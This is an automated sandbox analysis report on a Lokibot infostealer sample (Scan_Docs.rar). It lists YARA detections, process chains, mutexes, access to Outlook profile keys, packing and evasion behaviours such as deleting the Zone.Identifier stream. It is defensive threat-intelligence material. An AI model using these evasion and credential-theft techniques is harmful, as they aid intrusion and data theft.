                Source: 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe, type: DROPPEDMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe, type: DROPPEDMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 6.0.Scan_Docs.exe.7c0000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 5.0.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.3.7za.exe.23c0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 1.3.7za.exe.23c0000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 6.2.Scan_Docs.exe.7c0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 1.3.7za.exe.23c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Steve Miller, Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 5.2.Scan_Docs.exe.cd0000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.3.7za.exe.23c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: classification engineClassification label: mal100.spyw.evad.winRAR@11/6@0/1
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_0040650A
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,6_2_0040434D
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_Docs.exe.logJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeMutant created: \Sessions\1\BaseNamedObjects\F7EE0CF1CF93AA2F06F12A09
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4076:120:WilError_01
                Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\fxwllydk.nyzJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\497ab1dd171eeef956401f1aeb0b9fec\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Scan_Docs.rarVirustotal: Detection: 16%
                Source: Scan_Docs.rarReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Windows\SysWOW64\unarchiver.exe 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Desktop\Scan_Docs.rar'
                Source: unknownProcess created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc' 'C:\Users\user\Desktop\Scan_Docs.rar'
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe'
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc' 'C:\Users\user\Desktop\Scan_Docs.rar'Jump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe'Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                Source: Binary string: C:\Users\Switch\source\repos\OchiiMei\OchiiMei\obj\Release\tgrdcgd.pdb source: Scan_Docs.exe, 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp
                Source: Binary string: C:\Users\Switch\source\repos\OchiiMei\OchiiMei\obj\Release\tgrdcgd.pdbg6 source: Scan_Docs.exe, 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp

                Data Obfuscation:

                barindex
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 00000005.00000003.638435641.0000000006005000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.637987007.0000000006046000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.643700184.00000000040E6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.638046125.0000000006055000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.643749879.000000000410A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.643793917.0000000004124000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.958233246.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.642453797.00000000030C1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Scan_Docs.exe PID: 4192, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Scan_Docs.exe PID: 4764, type: MEMORY
                Source: Yara matchFile source: 6.2.Scan_Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.Scan_Docs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_00CD805D push es; ret 5_2_00CD81DA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_00CD2860 push es; ret 5_2_00CD2C6A
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_00CF41C9 pushfd ; iretd 5_2_00CF41EA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_00CF4139 pushfd ; iretd 5_2_00CF41EA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_00CF9AD2 push ebx; iretd 5_2_00CF9ADF
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_00D0F29F push eax; ret 5_2_00D0F2AF
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_00CF2797 push esi; ret 5_2_00CF2845
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 5_2_02ECC9C9 push E86A5725h; retf 5_2_02ECCA01
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_00402AC0 push eax; ret 6_2_00402AD4
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_00402AC0 push eax; ret 6_2_00402AFC
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_007C2860 push es; ret 6_2_007C2C6A
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_007C805D push es; ret 6_2_007C81DA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_007E4139 pushfd ; iretd 6_2_007E41EA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_007E41C9 pushfd ; iretd 6_2_007E41EA
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_007E9AD2 push ebx; iretd 6_2_007E9ADF
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_007FF29F push eax; ret 6_2_007FF2AF
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeCode function: 6_2_007E2797 push esi; ret 6_2_007E2845

                Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeJump to dropped file

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeFile opened: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\czb3sk2g.igc\Scan_Docs.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
